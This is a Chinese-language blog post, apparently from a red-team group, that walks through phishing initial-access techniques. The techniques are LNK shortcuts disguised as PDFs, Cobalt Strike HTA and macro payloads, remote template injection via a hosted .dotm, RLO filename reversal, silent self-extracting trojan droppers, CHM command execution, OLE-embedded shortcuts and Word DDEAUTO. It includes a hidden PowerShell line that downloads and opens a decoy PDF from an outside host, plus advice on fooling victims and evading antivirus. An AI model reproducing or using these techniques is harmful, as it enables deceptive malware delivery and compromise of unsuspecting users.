技术交流
关注微信公众号 Z20安全团队 , 回复 加群 ,拉你入群 一起讨论技术。
直接公众号文章复制过来的,排版可能有点乱, 可以去公众号看。
INK
lnk⽂件,简单理解为快捷⽅式,创建⽅式如下:
下图为calc.exe的快捷⽅式的属性信息,我们可以在“⽬标”栏写⼊⾃⼰的恶意命令,如powershell上线命令:
然后运行,即可在CS上线。
⽽在实施钓⻥过程中,对于我们的calc.exe的快捷⽅式来说,⼀个⼤⼤的计算机ico图标,显然看起来不像⼀个好玩意,因此可以尝试在“属性”中去更改该⽂件的图标:
但是⽤系统⾃带的ico去做⽂件图标替换的话,有个弊端,即当替换的ico在⽬标机器上不存在时,就会出现类似空⽩ico图标:
比较好的方法是修改lnk的icon_location标志位,修改为相关后缀,系统即可⾃动联想到对应的打开⽅式:
用winhex或者010 Editor打开该LNK文件,找到String Data部分ICON_LOCATION字符串:
我们要将其修改为.\1.pdf(Unicode),其长度0x07:
07002E005C0031002E00700064006600
我的pdf默认是由edge浏览器打开,则在icon_location中设置为pdf后缀时,⽂件的ico也会自动显示为edge浏览器打开的图标, 这样可以达到⾃适配的效果:
当受害者中招打开我们的所谓的pdf,实则为恶意的快捷⽅式时,双击两下,什么反应都没有,可能会有⼀丝疑惑,因此可以当尝试⽤powershell、mshta等⽅式上线时,我们可以更改如cobaltstrike⽣成的代码,加上⼀段⾃动下载打开⼀份真的pdf,来达到逼真的效果,具体过程如下:
首先新建一指向%windir%\System32\mshta.exe的快捷方式(文件名尽量带有迷惑性),并更改其图标为%SystemRoot%\System32\SHELL32.dll中任意一个:
使用CS生成一个powershell方式的HTA木马
打开hta文件,在其执行payload前增加如下 语句:
Dim open_pdfSet open_pdf = CreateObject("Wscript.Shell")open_pdf.run "powershell -nop -w hidden (new-object System.Net.WebClient).DownloadFile('http://192.168.50.15:8000/1.pdf',$env:temp+'\1.pdf');Start-Process $env:temp'\1.pdf'", 0, true
然后python起个http服务
这样一来,在受害者打开LNK文件后会从远程下载一正常PDF文档并打开。
接下来使用上面的方法修改快捷方式图标为pdf的图标。
使用CS设置HTA文件下载:
之后更改快捷方式的参数为HTA下载地址:
之后双击该LNK文件,主机便会上线,而受害者会看到一正常的PDF文档:
宏
CS
生成office宏病毒文件,此程序包生成一个VBA宏,您可以将其嵌入到Microsoft Word或Excel文档中。此攻击适用于Windows上的x86和x64 Office
在word的视图功能中植⼊相关宏:
随便创建一个宏,将CS的Macro代码复制进去保存就可以。运行,word即可上线。(excel类似)
但是此种办法有个弊端,就是宏代码是存在本地的,极易被杀软查杀。
远程模板注入宏代码
因此我们可以尝试使⽤远程加载模板的⽅式在进⾏宏加载。
原理:
利用Word文档加载附加模板时的缺陷所发起的恶意请求,而达到的攻击目的,所以当目标用户点开攻击者发送的恶意Word文档就可以通过向远程服务器发送恶意请求的方式,然后加载模板执行恶意模板的宏。
发送的文档本身不带恶意代码,所以能过很多静态检测。只需要在远程DOTM文档中编写宏病毒或者木马即可。
思路:
编写一个带有宏代码的DOTM文档,上传服务器
编写一个带模板的DOCX文档
将该文档压缩找到并更改settings.xml.rels文件中的内容,将其中的target内容修改为服务器上DOTM文档的URL
将DOCX解压后的内容再以存储模式压缩为ZIP
修改后缀名为DOCX,打开后即可实现远程注入宏文档
新建word, 打开宏代码编辑环境后,在本文档的ThisDocument下,编写如下宏代码
保存时保存类型为 dotm :
开启Web服务,放在其目录下, http://192.168.111.234/cs_macro.dotm
制作 docx
创建一个简历模板word文档:
将word文件后缀 docx 改为 zip,解压,找到settings.xml.rels
用文本编辑器打开,修改target项,可用的协议有ftp、smb、http,这里使用http:
将 target 内容改为http://192.168.111.234/cs_macro.dotm
之后全选目录所有文件,压缩为macro_test.zip,再将后缀改为docx
制作完成。
双击打开,启动宏,即可上线:
文件名反转RLO
RLO,即Right-to-Left Override,我们可以在⽂件名中插⼊此类unicode字符,来达到⽂件名反转的效果。
以calc.exe来举例,
将其重命名为calcgpj.exe,然后在 calc 与 g 之间右键,看图操作
ok,此时已经变成了 以 jpg 结尾的了。但是双击运行还是 exe 格式运行的。
再利用ResourceHacker修改图标。
找个图片转换为 ico 格式。
http://www.bitbug.net/
如图,双击实际上还是运行的calc。
自解压
首先我们需要准备好木马(cmd.exe)、正常程序(calc.exe)
-
选中两个程序,然后添加到压缩文件,创建自解压
2.高级自解压选项,常规:解压路径 ——> 绝对路径:
路径写C:\windows\temp
3.高级自解压选项->设置
C:\windows\temp\选中的木马名
C:\windows\temp\选中的程序名
4.高级自解压选项->模式
静默模式->隐藏所有
5.高级自解压选项->更新
更新模式->解压并更新
覆盖模式->覆盖所有文件
6.确定
执行一下,发现达到了效果,在这里我们还需要做一些细节的伪装.
使用Resource Hacker换一下图标:
运行
自解压+RLO
-
将png图片和muma.exe自解压成 gnp.exe
-
RLO,文件名反转成 exe.png
-
修改exe.png图标,变成个图片
-
运行,看起来是个图⽚,后缀也是个图⽚,打开也是个图⽚,但是木马成功执行
双击,pikaexe.jpg
CHM 电子书
CHM(Compiled Help Manual)即“已编译的帮助文件”。它是微软新一代的帮助文件格式,利用HTML作源文,把帮助内容以类似数据库的形式编译储存。
制作CHM需要用到一个工具 EasyCHM(http://www.etextwizard.com/)
新建一个html文件,编码格式ANSI,向里面写入如下内容
<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>command exec<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1><PARAM name="Command" value="ShortCut"><PARAM name="Button" value="Bitmap::shortcut"><PARAM name="Item1" value=',cmd.exe,/c calc.exe'>
//这一排用于执行命令,注意cmd.exe前后都有,或者<PARAM name="Item1" value=',powershell.exe,-c calc.exe'>也行
<PARAM name="Item2" value="273,1,1"></OBJECT><SCRIPT>x.Click();</SCRIPT></body></html>
用easychm,新建-浏览-选择html文件所在目录-编译
生成一个chm,双击,打开了计算器
office OLE+LNK
核心目标是创建一个内嵌的lnk文件诱导用户点击,从而执行命令。word,excel都能使用
我们创建一个快捷方式如下
其目标处填写的是
%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe -command calc然后打开word文件,插入对象,选择package,为了更加逼真勾选显示为图标,然后可以更改图标,我们在更改图标处选择一个迷惑性比较大的图标
然后进入创建软件包界面,选择我们刚刚创建的lnk文件,写好卷标名,然后就把软件包插入到word界面了,只要用户点击该软件包并选择执行,则会执行我们在lnk中定义的代码
捆绑文件
K8免杀系统自带捆绑器加强版V2.0.EXE
超级文件捆绑器
生成,执行之后会执行cmd.exe一样的效果,但此时后门软件也被执行了。
Word DDE
在word文件里,输入 ctrl+F9,进入到域代码编辑。我们可以键入以下代码使文件在被打开时执行系统命令(word2019复现未成功,word2016成功,似乎是word版本问题
这个蛮实用的,目前众多word是默认禁用宏的,dde只需要用户点击两个按钮即可执行,实用性比宏好
DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"随后在打开该文件时会出现两个对话框,全点是就会执行以上命令了
技术交流
交流群
关注公众号回复“加群”,添加Z2OBot 小K自动拉你加入Z2O安全攻防交流群分享更多好东西。
1403
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
